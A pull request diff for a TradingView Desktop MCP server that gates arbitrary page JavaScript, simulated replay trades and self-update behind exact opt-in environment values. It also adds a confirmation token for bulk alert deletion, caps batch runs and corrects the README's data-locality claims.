### PR TITLE
feat: harden dangerous capabilities behind explicit opt-in gates

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -5,3 +5,10 @@ temp_*
 *.log
 discovery-log.json
 rules.json
+.atl/
+.claude/
+
+# Research-SDD investigation artifacts (not product)
+/corpus/
+/retros/
+/tools/

--- a/README.md
+++ b/README.md
@@ -77,6 +77,7 @@ Gives your AI assistant eyes and hands on your own chart:
 | `ui_evaluate` | Disabled | Exact arbitrary-JavaScript acknowledgment required |
 | `replay_trade` | Disabled | Exact simulated-position acknowledgment required |
 | `tv_update` | Disabled | Exact self-update acknowledgment required; pulls and runs remote code |
+| `alert_delete` (`delete_all`) | Enabled | Irreversible bulk delete requires an exact `confirm` token; a bare `delete_all` is refused |
 | Replay navigation | Enabled | `start`, `step`, `autoplay`, `status`, and `stop` do not require the trade capability |
 
 The exact opt-in values are documented in [SECURITY.md](SECURITY.md); generic truthy flags are rejected. `replay_trade` only changes TradingView's internal Bar Replay simulated positions. Replay and paper trading are not the same as enforced isolation: the MCP cannot verify account type or guarantee that a real broker is disconnected. Use replay only with real broker connections removed.

--- a/README.md
+++ b/README.md
@@ -76,6 +76,7 @@ Gives your AI assistant eyes and hands on your own chart:
 |------------|---------|----------|
 | `ui_evaluate` | Disabled | Exact arbitrary-JavaScript acknowledgment required |
 | `replay_trade` | Disabled | Exact simulated-position acknowledgment required |
+| `tv_update` | Disabled | Exact self-update acknowledgment required; pulls and runs remote code |
 | Replay navigation | Enabled | `start`, `step`, `autoplay`, `status`, and `stop` do not require the trade capability |
 
 The exact opt-in values are documented in [SECURITY.md](SECURITY.md); generic truthy flags are rejected. `replay_trade` only changes TradingView's internal Bar Replay simulated positions. Replay and paper trading are not the same as enforced isolation: the MCP cannot verify account type or guarantee that a real broker is disconnected. Use replay only with real broker connections removed.

--- a/README.md
+++ b/README.md
@@ -11,24 +11,24 @@ Personal AI assistant for your TradingView Desktop charts. Connects Claude Code 
 > **Requires a valid TradingView subscription.** This tool does not bypass or circumvent any TradingView paywall or access control. It reads from and controls the TradingView Desktop app already running on your machine.
 
 > [!NOTE]
-> **All data processing occurs locally on your machine.** No TradingView data is transmitted, stored, or redistributed externally by this tool.
+> MCP control and CDP communication occur locally. The active TradingView application and several tools can still make authenticated requests to TradingView services; this project does not guarantee that all data remains local.
 
 > [!CAUTION]
 > This tool accesses undocumented internal TradingView APIs via the Electron debug interface. These can change or break without notice in any TradingView update. Pin your TradingView Desktop version if stability matters to you.
 
-## How It Works (and why it's safe to run)
+## How It Works
 
-This tool does not connect to TradingView's servers, modify any TradingView files, or intercept any network traffic. It communicates exclusively with your locally running TradingView Desktop instance via Chrome DevTools Protocol (CDP) — a standard debugging interface built into all Chromium/Electron applications by Google, including VS Code, Slack, and Discord.
+This tool communicates with your locally running TradingView Desktop instance via Chrome DevTools Protocol (CDP), a standard Chromium/Electron debugging interface. Code evaluated in the page context can use the active TradingView session and its network access.
 
 The debug port is disabled by default and must be explicitly enabled by you using a standard Chromium flag (`--remote-debugging-port=9222`). Nothing happens without that deliberate step.
 
-## What This Tool Does Not Do
+## What This Tool Does Not Provide
 
-- Connect to TradingView's servers or APIs
-- Store, transmit, or redistribute any market data
+- Standalone or offline TradingView access; the Desktop session and some tools make authenticated service requests
+- Automatic transmission or redistribution of market data to third parties
 - Work without a valid TradingView subscription and installed Desktop app
 - Bypass any TradingView paywall or access restriction
-- Execute real trades (chart interaction only)
+- Provide a broker-order API; replay trades use TradingView's historical replay API
 - Work if TradingView changes their internal Electron structure
 
 ## Research Context
@@ -69,6 +69,18 @@ Gives your AI assistant eyes and hands on your own chart:
 - **Monitor your chart** — stream JSONL from your locally running chart for local monitoring scripts
 - **CLI access** — every MCP tool is also a `tv` CLI command, pipe-friendly with JSON output
 - **Launch TradingView** — auto-detect and launch with debug mode from any platform
+
+## Security Boundaries
+
+| Capability | Default | Boundary |
+|------------|---------|----------|
+| `ui_evaluate` | Disabled | Exact arbitrary-JavaScript acknowledgment required |
+| `replay_trade` | Disabled | Exact simulated-position acknowledgment required |
+| Replay navigation | Enabled | `start`, `step`, `autoplay`, `status`, and `stop` do not require the trade capability |
+
+The exact opt-in values are documented in [SECURITY.md](SECURITY.md); generic truthy flags are rejected. `replay_trade` only changes TradingView's internal Bar Replay simulated positions. Replay and paper trading are not the same as enforced isolation: the MCP cannot verify account type or guarantee that a real broker is disconnected. Use replay only with real broker connections removed.
+
+Generic UI controls can click and type into whatever TradingView currently displays. Other state-changing tools can modify charts, alerts, scripts, layouts, watchlists, local files, or this checkout.
 
 ## Install with Claude Code
 
@@ -186,7 +198,7 @@ tv screenshot / discover / ui-state / range / scroll
 
 The `tv stream` commands poll your locally running TradingView Desktop instance at regular intervals via Chrome DevTools Protocol on localhost.
 
-No connection is made to TradingView's servers. All data stays on your machine.
+The MCP-to-Desktop transport is local. The authenticated TradingView Desktop session may still receive data from TradingView services, and stream output is written to local stdout where downstream consumers can store or transmit it.
 
 > [!WARNING]
 > Programmatic consumption of TradingView data may conflict with their Terms of Use regardless of the data source. You are solely responsible for ensuring your usage complies.
@@ -293,7 +305,7 @@ Read `line.new()`, `label.new()`, `table.new()`, `box.new()` output from any vis
 | `replay_start` | Enter replay at a date |
 | `replay_step` | Advance one bar |
 | `replay_autoplay` | Auto-advance (set speed in ms) |
-| `replay_trade` | Buy/sell/close positions |
+| `replay_trade` | Change simulated Bar Replay positions (disabled by default) |
 | `replay_status` | Check position, P&L, date |
 | `replay_stop` | Return to realtime |
 
@@ -370,7 +382,7 @@ This tool is an independent MCP server that connects to Claude Code via the stan
 
 This project is provided **for personal, educational, and research purposes only**.
 
-**How this tool works:** This tool uses Chrome DevTools Protocol (CDP), the standard debugging interface built into Chromium-based applications. It does not reverse engineer any proprietary TradingView protocol, connect to TradingView's servers, or bypass any access controls. The debug port must be explicitly enabled by the user via a standard Chromium command-line flag (`--remote-debugging-port=9222`).
+**How this tool works:** This tool uses Chrome DevTools Protocol (CDP), the standard debugging interface built into Chromium-based applications, to control an authenticated TradingView Desktop page. The page and some tools can make requests to TradingView services. The project does not bypass access controls, and the debug port must be explicitly enabled by the user via a standard Chromium command-line flag (`--remote-debugging-port=9222`).
 
 By using this software, you acknowledge and agree that:
 
@@ -382,8 +394,8 @@ By using this software, you acknowledge and agree that:
    - Circumventing TradingView's access controls or subscription restrictions
    - Performing automated trading or algorithmic decision-making using extracted data
    - Violating the intellectual property rights of Pine Script indicator authors
-   - Connecting to TradingView's servers or infrastructure (all access is via the locally running Desktop app)
-5. The streaming functionality monitors your locally running TradingView Desktop instance only. It does not connect to TradingView's servers or extract data from TradingView's infrastructure.
+   - Attempting to bypass the authenticated Desktop session or TradingView access controls
+5. The streaming functionality polls the locally running Desktop page through CDP. The page may receive data from TradingView services, and anything consuming stdout controls where the resulting stream data goes.
 6. Market data accessed through this tool remains subject to exchange and data provider licensing terms. **Do not redistribute, store, or commercially exploit any data obtained through this tool.**
 7. This tool accesses internal, undocumented TradingView application interfaces that may change or break at any time without notice.
 

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -52,6 +52,8 @@ TRADINGVIEW_MCP_ALLOW_SELF_UPDATE=I_UNDERSTAND_THIS_PULLS_AND_RUNS_REMOTE_CODE
 
 Replay navigation (`replay_start`, `replay_step`, `replay_autoplay`, `replay_status`, and `replay_stop`) does not require this capability.
 
+`alert_delete` with `delete_all` performs an irreversible bulk deletion of every price alert on the account. It is not env-gated (creating and deleting individual alerts is routine), but a bare `delete_all` is refused: the caller must pass `confirm: "DELETE_ALL_ALERTS"` so an assistant or injected prompt cannot wipe every alert from a single casual flag.
+
 Do not enable dangerous capabilities for routine use. Other tools still control the TradingView UI, modify chart or cloud state, create alerts, launch a local process, and self-update this checkout. Treat MCP clients and prompts as trusted code, and review every state-changing request.
 
 This repository has no broker-order integration. The Replay trade gate does not inspect account type, broker connectivity, or every TradingView UI state, so it cannot prove demo/paper isolation. Keep real brokers disconnected and do not use generic UI automation around order-entry surfaces.

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -44,6 +44,12 @@ TRADINGVIEW_MCP_ALLOW_ARBITRARY_PAGE_JS=I_UNDERSTAND_THIS_EXECUTES_ARBITRARY_JAV
 TRADINGVIEW_MCP_ALLOW_REPLAY_TRADES=I_UNDERSTAND_THIS_CHANGES_SIMULATED_REPLAY_POSITIONS
 ```
 
+`tv_update` fast-forwards the checkout to `origin/main` and runs `npm ci`, executing whatever remote code and dependencies arrive from the repository. It is denied before any git, network, or npm side effect unless the server or CLI is started with:
+
+```text
+TRADINGVIEW_MCP_ALLOW_SELF_UPDATE=I_UNDERSTAND_THIS_PULLS_AND_RUNS_REMOTE_CODE
+```
+
 Replay navigation (`replay_start`, `replay_step`, `replay_autoplay`, `replay_status`, and `replay_stop`) does not require this capability.
 
 Do not enable dangerous capabilities for routine use. Other tools still control the TradingView UI, modify chart or cloud state, create alerts, launch a local process, and self-update this checkout. Treat MCP clients and prompts as trusted code, and review every state-changing request.

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -29,3 +29,23 @@ This project connects to a locally running TradingView Desktop instance via Chro
 - Do not expose port 9222 to your network or the internet
 - Do not pipe `tv stream` output to external services without reviewing the data
 - Keep your TradingView Desktop and Node.js installations up to date
+
+## Capability Boundaries
+
+`ui_evaluate` can execute arbitrary JavaScript with the privileges of the active TradingView page. It is denied before any CDP call unless the MCP server or CLI is deliberately started with:
+
+```text
+TRADINGVIEW_MCP_ALLOW_ARBITRARY_PAGE_JS=I_UNDERSTAND_THIS_EXECUTES_ARBITRARY_JAVASCRIPT
+```
+
+`replay_trade` changes only TradingView's internal Bar Replay simulated position. It is independently denied before any CDP call unless the server or CLI is started with:
+
+```text
+TRADINGVIEW_MCP_ALLOW_REPLAY_TRADES=I_UNDERSTAND_THIS_CHANGES_SIMULATED_REPLAY_POSITIONS
+```
+
+Replay navigation (`replay_start`, `replay_step`, `replay_autoplay`, `replay_status`, and `replay_stop`) does not require this capability.
+
+Do not enable dangerous capabilities for routine use. Other tools still control the TradingView UI, modify chart or cloud state, create alerts, launch a local process, and self-update this checkout. Treat MCP clients and prompts as trusted code, and review every state-changing request.
+
+This repository has no broker-order integration. The Replay trade gate does not inspect account type, broker connectivity, or every TradingView UI state, so it cannot prove demo/paper isolation. Keep real brokers disconnected and do not use generic UI automation around order-entry surfaces.

--- a/package.json
+++ b/package.json
@@ -18,7 +18,7 @@
     "test": "node --test tests/e2e.test.js tests/pine_analyze.test.js",
     "test:e2e": "node --test tests/e2e.test.js",
     "test:unit": "node --test tests/pine_analyze.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
-    "test:safe": "node --test tests/capabilities.test.js tests/sanitization.test.js tests/replay.test.js tests/chart_indicator.test.js tests/chart_history.test.js",
+    "test:safe": "node --test tests/capabilities.test.js tests/sanitization.test.js tests/replay.test.js tests/update.test.js tests/chart_indicator.test.js tests/chart_history.test.js",
     "test:cli": "node --test tests/cli.test.js",
     "test:all": "node --test tests/e2e.test.js tests/pine_analyze.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
     "test:verbose": "node --test --test-reporter=spec tests/e2e.test.js tests/pine_analyze.test.js",

--- a/package.json
+++ b/package.json
@@ -17,10 +17,10 @@
     "lint": "eslint src/",
     "test": "node --test tests/e2e.test.js tests/pine_analyze.test.js",
     "test:e2e": "node --test tests/e2e.test.js",
-    "test:unit": "node --test tests/pine_analyze.test.js tests/pine_source.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/alerts.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
-    "test:safe": "node --test tests/capabilities.test.js tests/alerts.test.js tests/pine_source.test.js tests/sanitization.test.js tests/replay.test.js tests/update.test.js tests/chart_indicator.test.js tests/chart_history.test.js",
+    "test:unit": "node --test tests/pine_analyze.test.js tests/pine_source.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/alerts.test.js tests/input_validation.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
+    "test:safe": "node --test tests/capabilities.test.js tests/alerts.test.js tests/pine_source.test.js tests/input_validation.test.js tests/sanitization.test.js tests/replay.test.js tests/update.test.js tests/chart_indicator.test.js tests/chart_history.test.js",
     "test:cli": "node --test tests/cli.test.js",
-    "test:all": "node --test tests/e2e.test.js tests/pine_analyze.test.js tests/pine_source.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/alerts.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
+    "test:all": "node --test tests/e2e.test.js tests/pine_analyze.test.js tests/pine_source.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/alerts.test.js tests/input_validation.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
     "test:verbose": "node --test --test-reporter=spec tests/e2e.test.js tests/pine_analyze.test.js",
     "test:count": "node --test --test-reporter=spec tests/e2e.test.js 2>&1 | tail -5"
   },

--- a/package.json
+++ b/package.json
@@ -17,10 +17,10 @@
     "lint": "eslint src/",
     "test": "node --test tests/e2e.test.js tests/pine_analyze.test.js",
     "test:e2e": "node --test tests/e2e.test.js",
-    "test:unit": "node --test tests/pine_analyze.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/alerts.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
-    "test:safe": "node --test tests/capabilities.test.js tests/alerts.test.js tests/sanitization.test.js tests/replay.test.js tests/update.test.js tests/chart_indicator.test.js tests/chart_history.test.js",
+    "test:unit": "node --test tests/pine_analyze.test.js tests/pine_source.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/alerts.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
+    "test:safe": "node --test tests/capabilities.test.js tests/alerts.test.js tests/pine_source.test.js tests/sanitization.test.js tests/replay.test.js tests/update.test.js tests/chart_indicator.test.js tests/chart_history.test.js",
     "test:cli": "node --test tests/cli.test.js",
-    "test:all": "node --test tests/e2e.test.js tests/pine_analyze.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/alerts.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
+    "test:all": "node --test tests/e2e.test.js tests/pine_analyze.test.js tests/pine_source.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/alerts.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
     "test:verbose": "node --test --test-reporter=spec tests/e2e.test.js tests/pine_analyze.test.js",
     "test:count": "node --test --test-reporter=spec tests/e2e.test.js 2>&1 | tail -5"
   },

--- a/package.json
+++ b/package.json
@@ -17,10 +17,10 @@
     "lint": "eslint src/",
     "test": "node --test tests/e2e.test.js tests/pine_analyze.test.js",
     "test:e2e": "node --test tests/e2e.test.js",
-    "test:unit": "node --test tests/pine_analyze.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
-    "test:safe": "node --test tests/capabilities.test.js tests/sanitization.test.js tests/replay.test.js tests/update.test.js tests/chart_indicator.test.js tests/chart_history.test.js",
+    "test:unit": "node --test tests/pine_analyze.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/alerts.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
+    "test:safe": "node --test tests/capabilities.test.js tests/alerts.test.js tests/sanitization.test.js tests/replay.test.js tests/update.test.js tests/chart_indicator.test.js tests/chart_history.test.js",
     "test:cli": "node --test tests/cli.test.js",
-    "test:all": "node --test tests/e2e.test.js tests/pine_analyze.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
+    "test:all": "node --test tests/e2e.test.js tests/pine_analyze.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/alerts.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
     "test:verbose": "node --test --test-reporter=spec tests/e2e.test.js tests/pine_analyze.test.js",
     "test:count": "node --test --test-reporter=spec tests/e2e.test.js 2>&1 | tail -5"
   },

--- a/package.json
+++ b/package.json
@@ -17,9 +17,10 @@
     "lint": "eslint src/",
     "test": "node --test tests/e2e.test.js tests/pine_analyze.test.js",
     "test:e2e": "node --test tests/e2e.test.js",
-    "test:unit": "node --test tests/pine_analyze.test.js tests/cli.test.js tests/sanitization.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
+    "test:unit": "node --test tests/pine_analyze.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
+    "test:safe": "node --test tests/capabilities.test.js tests/sanitization.test.js tests/replay.test.js tests/chart_indicator.test.js tests/chart_history.test.js",
     "test:cli": "node --test tests/cli.test.js",
-    "test:all": "node --test tests/e2e.test.js tests/pine_analyze.test.js tests/cli.test.js tests/sanitization.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
+    "test:all": "node --test tests/e2e.test.js tests/pine_analyze.test.js tests/cli.test.js tests/sanitization.test.js tests/capabilities.test.js tests/replay.test.js tests/launch.test.js tests/chart_indicator.test.js tests/chart_history.test.js tests/update.test.js",
     "test:verbose": "node --test --test-reporter=spec tests/e2e.test.js tests/pine_analyze.test.js",
     "test:count": "node --test --test-reporter=spec tests/e2e.test.js 2>&1 | tail -5"
   },

--- a/src/capabilities.js
+++ b/src/capabilities.js
@@ -2,6 +2,8 @@ export const ARBITRARY_PAGE_JS_ENV = 'TRADINGVIEW_MCP_ALLOW_ARBITRARY_PAGE_JS';
 export const ARBITRARY_PAGE_JS_ACK = 'I_UNDERSTAND_THIS_EXECUTES_ARBITRARY_JAVASCRIPT';
 export const REPLAY_TRADING_ENV = 'TRADINGVIEW_MCP_ALLOW_REPLAY_TRADES';
 export const REPLAY_TRADING_ACK = 'I_UNDERSTAND_THIS_CHANGES_SIMULATED_REPLAY_POSITIONS';
+export const SELF_UPDATE_ENV = 'TRADINGVIEW_MCP_ALLOW_SELF_UPDATE';
+export const SELF_UPDATE_ACK = 'I_UNDERSTAND_THIS_PULLS_AND_RUNS_REMOTE_CODE';
 
 export function requireArbitraryPageJs(env = process.env) {
   if (env[ARBITRARY_PAGE_JS_ENV] !== ARBITRARY_PAGE_JS_ACK) {
@@ -15,6 +17,14 @@ export function requireReplayTrading(env = process.env) {
   if (env[REPLAY_TRADING_ENV] !== REPLAY_TRADING_ACK) {
     throw new Error(
       `Simulated Replay trades are disabled. To deliberately enable replay_trade, set ${REPLAY_TRADING_ENV}=${REPLAY_TRADING_ACK} when starting the MCP server or CLI.`,
+    );
+  }
+}
+
+export function requireSelfUpdate(env = process.env) {
+  if (env[SELF_UPDATE_ENV] !== SELF_UPDATE_ACK) {
+    throw new Error(
+      `Self-update is disabled. tv_update pulls origin/main and runs npm ci, executing remote code. To deliberately enable it, set ${SELF_UPDATE_ENV}=${SELF_UPDATE_ACK} when starting the MCP server or CLI.`,
     );
   }
 }

--- a/src/capabilities.js
+++ b/src/capabilities.js
@@ -1,0 +1,20 @@
+export const ARBITRARY_PAGE_JS_ENV = 'TRADINGVIEW_MCP_ALLOW_ARBITRARY_PAGE_JS';
+export const ARBITRARY_PAGE_JS_ACK = 'I_UNDERSTAND_THIS_EXECUTES_ARBITRARY_JAVASCRIPT';
+export const REPLAY_TRADING_ENV = 'TRADINGVIEW_MCP_ALLOW_REPLAY_TRADES';
+export const REPLAY_TRADING_ACK = 'I_UNDERSTAND_THIS_CHANGES_SIMULATED_REPLAY_POSITIONS';
+
+export function requireArbitraryPageJs(env = process.env) {
+  if (env[ARBITRARY_PAGE_JS_ENV] !== ARBITRARY_PAGE_JS_ACK) {
+    throw new Error(
+      `Arbitrary page JavaScript is disabled. To deliberately enable ui_evaluate, set ${ARBITRARY_PAGE_JS_ENV}=${ARBITRARY_PAGE_JS_ACK} when starting the MCP server or CLI.`,
+    );
+  }
+}
+
+export function requireReplayTrading(env = process.env) {
+  if (env[REPLAY_TRADING_ENV] !== REPLAY_TRADING_ACK) {
+    throw new Error(
+      `Simulated Replay trades are disabled. To deliberately enable replay_trade, set ${REPLAY_TRADING_ENV}=${REPLAY_TRADING_ACK} when starting the MCP server or CLI.`,
+    );
+  }
+}

--- a/src/cli/commands/alerts.js
+++ b/src/cli/commands/alerts.js
@@ -22,12 +22,18 @@ register('alert', {
       }),
     }],
     ['delete', {
-      description: 'Delete alerts',
+      description: 'Delete alerts (--all requires --confirm DELETE_ALL_ALERTS)',
       options: {
-        all: { type: 'boolean', description: 'Delete all alerts' },
+        all: { type: 'boolean', description: 'Delete all alerts (requires --confirm)' },
         id: { type: 'string', description: 'Alert id to delete (from alert list)' },
+        confirm: { type: 'string', description: `Must equal ${core.DELETE_ALL_CONFIRMATION} when --all is set` },
       },
-      handler: (opts) => core.deleteAlerts({ delete_all: opts.all, alert_id: opts.id ? Number(opts.id) : undefined }),
+      handler: (opts, positionals, _deps) => core.deleteAlerts({
+        delete_all: opts.all,
+        alert_id: opts.id ? Number(opts.id) : undefined,
+        confirm: opts.confirm,
+        _deps,
+      }),
     }],
   ]),
 });

--- a/src/cli/commands/health.js
+++ b/src/cli/commands/health.js
@@ -20,6 +20,6 @@ register('launch', {
 });
 
 register('update', {
-  description: 'Update to the latest version (git fast-forward + npm ci if deps changed)',
-  handler: () => update({}),
+  description: 'Update to the latest version (disabled by default; git fast-forward + npm ci if deps changed)',
+  handler: (opts, positionals, _deps) => update({ _deps }),
 });

--- a/src/cli/commands/pine.js
+++ b/src/cli/commands/pine.js
@@ -14,7 +14,10 @@ register('pine', {
   subcommands: new Map([
     ['get', {
       description: 'Get current Pine Script source from editor',
-      handler: () => core.getSource(),
+      options: {
+        'max-chars': { type: 'string', description: 'Cap the returned source to this many characters' },
+      },
+      handler: (opts) => core.getSource({ max_chars: opts['max-chars'] ? Number(opts['max-chars']) : undefined }),
     }],
     ['set', {
       description: 'Set Pine Script source (reads stdin or --file)',

--- a/src/cli/commands/replay.js
+++ b/src/cli/commands/replay.js
@@ -1,6 +1,10 @@
 import { register } from '../router.js';
 import * as core from '../../core/replay.js';
 
+function replayTradeCommand(opts, positionals, _deps) {
+  return core.trade({ action: positionals[0], _deps });
+}
+
 register('replay', {
   description: 'Replay mode controls',
   subcommands: new Map([
@@ -31,11 +35,8 @@ register('replay', {
       handler: (opts) => core.autoplay({ speed: opts.speed ? Number(opts.speed) : undefined }),
     }],
     ['trade', {
-      description: 'Execute a trade in replay mode (buy, sell, close)',
-      handler: (opts, positionals) => {
-        if (!positionals[0]) throw new Error('Action required. Usage: tv replay trade buy');
-        return core.trade({ action: positionals[0] });
-      },
+      description: 'SIMULATED: change a Bar Replay position (disabled by default; buy, sell, close)',
+      handler: replayTradeCommand,
     }],
   ]),
 });

--- a/src/cli/commands/ui.js
+++ b/src/cli/commands/ui.js
@@ -1,6 +1,11 @@
 import { register } from '../router.js';
 import * as core from '../../core/ui.js';
 
+function uiEvaluateCommand(opts, positionals, _deps) {
+  if (!positionals[0]) throw new Error('Expression required. Usage: tv ui eval "1+1"');
+  return core.uiEvaluate({ expression: positionals.join(' '), _deps });
+}
+
 register('ui', {
   description: 'UI automation tools (click, keyboard, hover, scroll, find, eval, type, panel, fullscreen, mouse)',
   subcommands: new Map([
@@ -59,11 +64,8 @@ register('ui', {
       },
     }],
     ['eval', {
-      description: 'Execute JavaScript in TradingView page context',
-      handler: (opts, positionals) => {
-        if (!positionals[0]) throw new Error('Expression required. Usage: tv ui eval "1+1"');
-        return core.uiEvaluate({ expression: positionals.join(' ') });
-      },
+      description: 'DANGEROUS: execute arbitrary page JavaScript (disabled by default)',
+      handler: uiEvaluateCommand,
     }],
     ['type', {
       description: 'Type text into focused input',

--- a/src/cli/commands/ui.js
+++ b/src/cli/commands/ui.js
@@ -2,7 +2,9 @@ import { register } from '../router.js';
 import * as core from '../../core/ui.js';
 
 function uiEvaluateCommand(opts, positionals, _deps) {
-  if (!positionals[0]) throw new Error('Expression required. Usage: tv ui eval "1+1"');
+  // No pre-check here: the capability gate inside core.uiEvaluate must run before
+  // any argument validation, mirroring replayTradeCommand. A missing expression is
+  // rejected by core AFTER the gate, so a disabled capability never leaks past it.
   return core.uiEvaluate({ expression: positionals.join(' '), _deps });
 }
 

--- a/src/cli/router.js
+++ b/src/cli/router.js
@@ -11,6 +11,11 @@ export function register(name, config) {
   commands.set(name, config);
 }
 
+export function getRegisteredHandler(name, subcommand) {
+  const command = commands.get(name);
+  return subcommand ? command?.subcommands?.get(subcommand)?.handler : command?.handler;
+}
+
 function printHelp() {
   console.log('Usage: tv <command> [options]\n');
   console.log('Commands:');

--- a/src/core/alerts.js
+++ b/src/core/alerts.js
@@ -6,7 +6,12 @@
  * Requests are sent as text/plain so the browser does not issue a CORS preflight that
  * the endpoint rejects. The create/delete bodies must be wrapped in a `payload` object.
  */
-import { evaluate, evaluateAsync, safeString, requireFinite } from '../connection.js';
+import { evaluate as _evaluate, evaluateAsync as _evaluateAsync, safeString, requireFinite } from '../connection.js';
+
+// Explicit token required to bulk-delete every alert. A bare delete_all boolean is
+// not enough — this guards against an assistant or injected prompt wiping the whole
+// account of alerts from a single casual flag.
+export const DELETE_ALL_CONFIRMATION = 'DELETE_ALL_ALERTS';
 
 // Map the tool's friendly condition names to TradingView's alert condition types.
 const CONDITION_TYPE_MAP = {
@@ -15,7 +20,15 @@ const CONDITION_TYPE_MAP = {
   less_than: 'less', less: 'less', below: 'less', '<': 'less',
 };
 
-export async function create({ condition, price, message }) {
+function _resolve(deps) {
+  return {
+    evaluate: deps?.evaluate || _evaluate,
+    evaluateAsync: deps?.evaluateAsync || _evaluateAsync,
+  };
+}
+
+export async function create({ condition, price, message, _deps } = {}) {
+  const { evaluate } = _resolve(_deps);
   const p = requireFinite(price, 'price');
   const condType = CONDITION_TYPE_MAP[String(condition || 'crossing').trim().toLowerCase()] || 'cross';
 
@@ -63,7 +76,8 @@ export async function create({ condition, price, message }) {
   `);
 }
 
-export async function list() {
+export async function list({ _deps } = {}) {
+  const { evaluateAsync } = _resolve(_deps);
   // Use pricealerts REST API — returns structured data with alert_id, symbol, price, conditions
   const result = await evaluateAsync(`
     fetch('https://pricealerts.tradingview.com/list_alerts', { credentials: 'include' })
@@ -94,13 +108,22 @@ export async function list() {
   return { success: true, alert_count: result?.alerts?.length || 0, source: 'internal_api', alerts: result?.alerts || [], error: result?.error };
 }
 
-export async function deleteAlerts({ delete_all, alert_ids, alert_id } = {}) {
+export async function deleteAlerts({ delete_all, alert_ids, alert_id, confirm, _deps } = {}) {
+  // Guard bulk deletion before any network request: a bare delete_all is not enough.
+  if (delete_all && confirm !== DELETE_ALL_CONFIRMATION) {
+    return {
+      success: false,
+      source: 'internal_api',
+      error: `Refusing to delete all alerts without explicit confirmation. Pass confirm: "${DELETE_ALL_CONFIRMATION}" to proceed.`,
+    };
+  }
+  const { evaluate } = _resolve(_deps);
   // Resolve the set of alert ids to delete.
   let ids = [];
   if (Array.isArray(alert_ids)) ids = ids.concat(alert_ids);
   if (alert_id != null) ids.push(alert_id);
   if (delete_all) {
-    const listed = await list();
+    const listed = await list({ _deps });
     ids = (listed.alerts || []).map((a) => a.alert_id);
   }
   ids = ids.filter((x) => x != null);

--- a/src/core/batch.js
+++ b/src/core/batch.js
@@ -10,8 +10,24 @@ import { fileURLToPath } from 'url';
 const __dirname = dirname(fileURLToPath(import.meta.url));
 const SCREENSHOT_DIR = join(dirname(dirname(__dirname)), 'screenshots');
 
+export const BATCH_ACTIONS = ['screenshot', 'get_ohlcv', 'get_strategy_results'];
+export const MAX_BATCH_ITERATIONS = 50;
+
 export async function batchRun({ symbols, timeframes, action, delay_ms, ohlcv_count }) {
+  // Validate before switching a single symbol: fail fast instead of half-running.
+  if (!Array.isArray(symbols) || symbols.length === 0) {
+    throw new Error('symbols must be a non-empty array');
+  }
+  if (!BATCH_ACTIONS.includes(action)) {
+    throw new Error(`action must be one of: ${BATCH_ACTIONS.join(', ')}`);
+  }
   const tfs = timeframes && timeframes.length > 0 ? timeframes : [null];
+  const iterations = symbols.length * tfs.length;
+  if (iterations > MAX_BATCH_ITERATIONS) {
+    throw new Error(
+      `Batch would run ${iterations} iterations (${symbols.length} symbols × ${tfs.length} timeframes), over the ${MAX_BATCH_ITERATIONS} cap. Narrow the symbol or timeframe list.`,
+    );
+  }
   const delay = delay_ms || 2000;
   const results = [];
 
@@ -72,7 +88,7 @@ export async function batchRun({ symbols, timeframes, action, delay_ms, ohlcv_co
             })()
           `);
         } else {
-          actionResult = { error: 'Unknown action or API not available: ' + action };
+          actionResult = { error: `Chart API not available for action "${action}" on ${symbol}` };
         }
         results.push({ ...combo, success: true, result: actionResult });
       } catch (err) {

--- a/src/core/pane.js
+++ b/src/core/pane.js
@@ -4,6 +4,16 @@
  */
